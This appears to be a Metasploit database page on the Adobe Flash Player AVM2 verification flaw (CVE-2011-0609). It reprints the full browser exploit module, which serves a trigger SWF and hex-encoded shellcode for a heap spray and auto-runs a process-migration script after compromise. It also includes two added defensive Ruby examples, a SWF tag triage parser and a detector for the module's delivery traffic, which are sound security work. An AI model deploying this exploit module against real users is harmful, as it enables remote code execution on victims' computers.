Adobe Flash Player AVM Bytecode Verification Vulnerability

Source: metasploit (www.rapid7.com)
ID: MSF:EXPLOIT-WINDOWS-BROWSER-ADOBE_FLASHPLAYER_AVM-
Author: bannedit <[email protected]>, Unknown
Published: 2011-03-23 04:31:48 (history: Mar 23, 2011 - 4:31 a.m.)

CVSS2: 9.3 High
  Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
  Attack Vector: NETWORK
  Attack Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: COMPLETE
  Integrity Impact: COMPLETE
  Availability Impact: COMPLETE

CVSS3: 7.8 High
  Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
  Attack Vector: LOCAL
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: REQUIRED
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH

EPSS: 0.972 High (percentile 99.8%)

This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33 and earlier. The issue is a failure in the ActionScript 3 AVM2 bytecode verification logic: bytecode that should have been rejected is accepted, and unsafe JIT (just-in-time) compiled code is executed. This is the same vulnerability that was used in the attack on RSA in March 2011.

Specifically, the flaw results in uninitialized memory being referenced and later executed. Exploiting it relies on heap spraying so that the contents of that uninitialized memory are under the attacker's control.

Currently this exploit works for IE6, IE7, and Firefox 3.6, and likely several other browsers. DEP does catch the exploit and causes it to fail; because of the nature of the uninitialized memory, it is fairly difficult to get around this restriction.
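The bytecode the vulnerable verifier consumes lives in the SWF's DoABC tags. The following is an added example, not code from the Metasploit module or from Adobe: a small SWF walker that unpacks FWS/CWS files, enumerates tags, and reports each DoABC block's name and ABC version, so a suspicious SWF can be triaged without a Flash runtime. Offsets and tag codes follow the SWF file format specification referenced by the module; the sample SWF built by `sample_swf` is constructed for this example and is not an exploit file.

```ruby
require 'zlib'

# Added example (not part of the Metasploit module): minimal SWF triage that
# finds DoABC tags (AVM2 bytecode) in a file without executing anything.
module SwfTriage
  TAG_END   = 0
  TAG_DOABC = 82

  # Split the 8-byte header (signature, version, declared length) and return
  # the uncompressed body. FWS is stored plain; CWS is zlib-compressed after
  # the header; ZWS (LZMA) is reported rather than handled here.
  def self.unpack(data)
    raise ArgumentError, 'too short to be a SWF' if data.bytesize < 8
    sig, version, declared_length = data.unpack('a3CV')
    body = data.byteslice(8..-1)
    case sig
    when 'FWS' then nil
    when 'CWS' then body = Zlib::Inflate.inflate(body)
    when 'ZWS' then raise NotImplementedError, 'LZMA-compressed SWF not handled here'
    else raise ArgumentError, "not a SWF, signature #{sig.inspect}"
    end
    { version: version, declared_length: declared_length, body: body }
  end

  # Byte size of the RECT frame-size field: a 5-bit Nbits, then four
  # Nbits-wide values, padded to a byte boundary.
  def self.rect_size(body)
    nbits = body.getbyte(0) >> 3
    (5 + 4 * nbits + 7) / 8
  end

  # Yield [tag_code, payload] for each tag. Stops at the End tag or at a
  # truncated header, so a malformed file cannot push the loop past EOF.
  def self.each_tag(body)
    pos = rect_size(body) + 4           # skip RECT, frame rate (u16), frame count (u16)
    while pos + 2 <= body.bytesize
      hdr = body.byteslice(pos, 2).unpack1('v')
      pos += 2
      code = hdr >> 6
      len  = hdr & 0x3F
      if len == 0x3F                    # long form: real length follows as u32
        break if pos + 4 > body.bytesize
        len = body.byteslice(pos, 4).unpack1('V')
        pos += 4
      end
      payload = body.byteslice(pos, len) || ''.b
      pos += len
      yield code, payload
      break if code == TAG_END
    end
  end

  # DoABC payload: flags (u32), NUL-terminated name, then the ABC block whose
  # first four bytes are minor/major version (16/46 for AVM2).
  def self.parse_doabc(payload)
    return { malformed: true, abc_size: payload.bytesize } if payload.bytesize < 5
    flags    = payload.unpack1('V')
    name_end = payload.index("\0".b, 4) || payload.bytesize
    name     = payload.byteslice(4, name_end - 4)
    abc      = payload.byteslice(name_end + 1, payload.bytesize) || ''.b
    minor, major = abc.unpack('vv')
    { flags: flags, name: name, abc_minor: minor, abc_major: major, abc_size: abc.bytesize }
  end

  # Full report: SWF version, tag histogram, every DoABC block, and whether the
  # declared length matches the real uncompressed size (a cheap sanity check).
  def self.scan(data)
    swf = unpack(data)
    report = { version: swf[:version], tags: Hash.new(0), doabc: [],
               length_ok: swf[:declared_length] == swf[:body].bytesize + 8 }
    each_tag(swf[:body]) do |code, payload|
      report[:tags][code] += 1
      report[:doabc] << parse_doabc(payload) if code == TAG_DOABC
    end
    report
  end

  # Constructed sample (not a real exploit file): one DoABC tag carrying only
  # the ABC version header plus four zero bytes, then an End tag.
  def self.sample_swf(compressed: false)
    abc   = [16, 46].pack('vv') + ("\0" * 4).b
    doabc = [1].pack('V') + "frame1\0".b + abc
    tag   = [(TAG_DOABC << 6) | 0x3F].pack('v') + [doabc.bytesize].pack('V') + doabc
    body  = "\0".b + [0x0C00, 1].pack('vv') + tag + [0].pack('v')   # RECT, 12 fps, 1 frame, tags
    sig   = compressed ? 'CWS' : 'FWS'
    data  = compressed ? Zlib::Deflate.deflate(body) : body
    [sig, 10, body.bytesize + 8].pack('a3CV') + data
  end
end

ARGV.each { |f| p SwfTriage.scan(File.binread(f)) } if __FILE__ == $0
```

Run it as `ruby swf_triage.rb sample.swf` to get the tag histogram and DoABC list. A file whose declared length disagrees with its real size, or whose DoABC version is not 16/46, is worth a closer look; the walker deliberately stops on a truncated tag header rather than trusting the length field, which is the kind of untrusted-length check the vulnerable verifier itself got wrong.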

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Adobe Flash Player AVM Bytecode Verification Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33
        and earlier. This issue is caused by a failure in the ActionScript 3 AVM2 verification
        logic. This results in unsafe JIT (just-in-time) code being executed. This is the same
        vulnerability that was used for the RSA attack in March 2011.

          Specifically, this issue results in uninitialized memory being referenced and later
        executed. Taking advantage of this issue relies on heap spraying and controlling the
        uninitialized memory.

          Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several
        other browsers. DEP does catch the exploit and causes it to fail. Due to the nature
        of the uninitialized memory it's fairly difficult to get around this restriction.
        },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bannedit', # Metasploit version,
          'Unknown'   # Malcode version seen used in targeted attacks
        ],
      'References'     =>
        [
          ['CVE', '2011-0609'],
          ['OSVDB', '71254'],
          ['URL', 'http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html'],
          ['URL', 'http://www.adobe.com/devnet/swf.html'],
          ['URL', 'http://www.adobe.com/support/security/advisories/apsa11-01.html'],
          ['URL', 'http://www.f-secure.com/weblog/archives/00002226.html'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC'          => 'process',
          'HTTP::compression' => 'gzip',
          'HTTP::chunked'     => true,
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {}],
        ],
      'DisclosureDate' => '2011-03-15',
      'DefaultTarget'  => 0))
  end

  def exploit
    # The trigger SWF is prebuilt from external/source/exploits/CVE-2011-0609/exploit.as
    # and shipped in the framework data directory; read it once, then start the HTTP server.
    path = File.join( Msf::Config.data_directory, "exploits", "CVE-2011-0609.swf" )
    fd = File.open( path, "rb" )
    @swf = fd.read(fd.stat.size)
    fd.close

    super
  end

  def on_request_uri(cli, request)
    trigger = @swf
    trigger_file = rand_text_alpha(rand(6)+3) + ".swf"   # random name, so the URL carries no static indicator
    shellcode = payload.encoded.unpack('H*')[0]           # hex string; the SWF decodes it for the spray
    obj_id = rand_text_alpha(rand(6)+3)

    # Second request: the browser fetches the SWF referenced by the HTML below.
    if request.uri.match(/\.swf/i)
      print_status("Sending Exploit SWF")
      send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
      return
    end

    # Third request: we use a nice trick by having Flash request our shellcode as plain
    # text and load it for the heap spray.
    # src for the flash file: external/source/exploits/CVE-2011-0609/exploit.as
    if request.uri.match(/\.txt/i)
      send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })
      return
    end

    html =  <<-EOS
    <html>
      <head>
      </head>
      <body>
    <center>
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
                 id="#{obj_id}" width="600" height="400"
                 codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
             <param name="movie" value="#{get_resource}#{trigger_file}" />
             <embed src="#{get_resource}#{trigger_file}" quality="high"
                 width="320" height="300" name="#{obj_id}" align="middle"
                 allowNetworking="all"
                 type="application/x-shockwave-flash"
                 pluginspage="http://www.macromedia.com/go/getflashplayer">
             </embed>

         </object>
    </center>

    </body>
    </html>
EOS

    print_status("Sending #{self.name} HTML")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end
end
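The module's request handling gives a defender a three-step pattern to look for: an HTML page, then a .swf from the same host, then a text/plain body that is nothing but hex (the module serves `payload.encoded.unpack('H*')[0]`) which the SWF decodes to fill the heap spray. The following is an added example, not part of the Metasploit module: a heuristic over HTTP transaction records that flags that sequence. The record field names, the 30-second window, and the sample transactions are all constructed for this example.

```ruby
# Added example (not part of the Metasploit module): flag the SWF-then-hex-blob
# delivery pattern in HTTP transaction records. Field names are assumed.
module FlashSprayDetect
  HEX_RE = /\A(?:[0-9a-fA-F]{2})+\z/
  SWF_CT = 'application/x-shockwave-flash'
  WINDOW = 30   # seconds allowed between the SWF fetch and the hex fetch (assumed)

  # A text/plain body that is nothing but hex pairs of a plausible payload size.
  def self.hex_blob?(body, min_bytes: 64)
    body.bytesize >= min_bytes * 2 && body.match?(HEX_RE)
  end

  # Inverse of unpack('H*'): the bytes the SWF would materialise before spraying.
  def self.decode_hex(body)
    [body].pack('H*')
  end

  # Transaction record: { t: epoch seconds, client:, host:, uri:, ctype:, body: }
  def self.swf_response?(tx)
    tx[:ctype] == SWF_CT || tx[:uri].match?(/\.swf(\?|\z)/i)
  end

  # Group by (client, host); alert on a hex text/plain body fetched shortly
  # after an SWF from the same host. Bodies must already be de-gzipped and
  # de-chunked: the module sets HTTP::compression and HTTP::chunked by default.
  def self.flag(transactions)
    alerts = []
    transactions.group_by { |tx| [tx[:client], tx[:host]] }.each do |(client, host), txs|
      txs  = txs.sort_by { |tx| tx[:t] }
      swfs = txs.select { |tx| swf_response?(tx) }
      txs.each do |tx|
        next unless tx[:ctype].start_with?('text/plain') && hex_blob?(tx[:body])
        prior = swfs.find { |s| s[:t] <= tx[:t] && tx[:t] - s[:t] <= WINDOW }
        next unless prior
        shellcode = decode_hex(tx[:body])
        alerts << { client: client, host: host, swf: prior[:uri], blob: tx[:uri],
                    bytes: shellcode.bytesize,
                    nul_free: !shellcode.include?("\0") }   # the module lists "\x00" as a bad char
      end
    end
    alerts
  end

  # Constructed sample traffic: 10.0.0.5 follows the exploit flow, 10.0.0.6
  # fetches an ordinary text file, 10.0.0.7 fetches hex with no SWF before it.
  HEX_BODY = ('90' * 200 + 'cc' * 800).freeze   # 1000 bytes, the module's payload Space
  SAMPLE = [
    { t: 100, client: '10.0.0.5', host: 'evil.example', uri: '/x/',          ctype: 'text/html',  body: '<html>' },
    { t: 101, client: '10.0.0.5', host: 'evil.example', uri: '/x/QzDfK.swf', ctype: SWF_CT,       body: 'FWS' },
    { t: 103, client: '10.0.0.5', host: 'evil.example', uri: '/x/pQ.txt',    ctype: 'text/plain', body: HEX_BODY },
    { t: 120, client: '10.0.0.6', host: 'cdn.example',  uri: '/README.txt',  ctype: 'text/plain', body: 'hello world ' * 40 },
    { t: 130, client: '10.0.0.7', host: 'cdn.example',  uri: '/k.txt',       ctype: 'text/plain', body: HEX_BODY },
  ].freeze
end

puts FlashSprayDetect.flag(FlashSprayDetect::SAMPLE).inspect if __FILE__ == $0
```

Both file names are randomised by the module, so the sequence and the body shape are the signal, not any fixed URI; the decoded size is reported because a blob near the module's 1000-byte payload Space is one more data point for the analyst.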
